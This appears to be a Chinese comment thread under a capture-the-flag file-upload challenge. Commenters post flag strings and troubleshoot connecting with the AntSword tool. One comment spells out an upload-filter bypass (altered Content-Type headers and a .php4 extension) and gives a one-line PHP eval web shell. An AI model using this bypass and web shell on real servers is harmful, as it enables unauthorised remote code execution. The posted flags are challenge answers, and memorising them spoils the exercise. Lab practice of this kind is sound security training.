怎么连上去打不开flag啊
flag{de5fd002182dd65121054872ac5570f0}
这个题较为好做,看到题目为文件上传想到需要BP去改包,将请求头的type,文件后缀,请求数据的type,进行更改,上传后返回路径,用蚁?直接连接,记得把代理关掉,不然不成功。
1.请求头部的 Content-Type:mulTIPart/form-data 2.文件后缀: .php4 3.请求数据的Content-Type:image/jpeg 4.一句话: <?php eval($_POST['cmd']); ?> 5.蚁剑:根目录
这题目现在改了吗?蚁剑连不了jpg,改成.php4,没改Content-Type就能连蚁剑了(显示valid file但是能连),一改Content-Type下面burpsuit字体就变蓝,连不了
蚁剑连不上是什么原因啊?
黑盒测出来也是有可能的,就是在请求头里面改改改,然后仔细观察返回的信息有什么差别。
其实, php 后缀的检测机制跟其他后缀如 txt 的不一样,这点是能测出来的,因为 php、php1 和 1php 这些后缀都是返回 invalid file,像 txt、aaa 这种就返回 give me a image file not a php。所以,包含 php 的检测至少用了 strpos() 做判断。我也只测到这种程度,修改 Content-Type 真想不到。
没任何提示
flag{01b6ad6be2af70f83f2c9282ad8d34c1}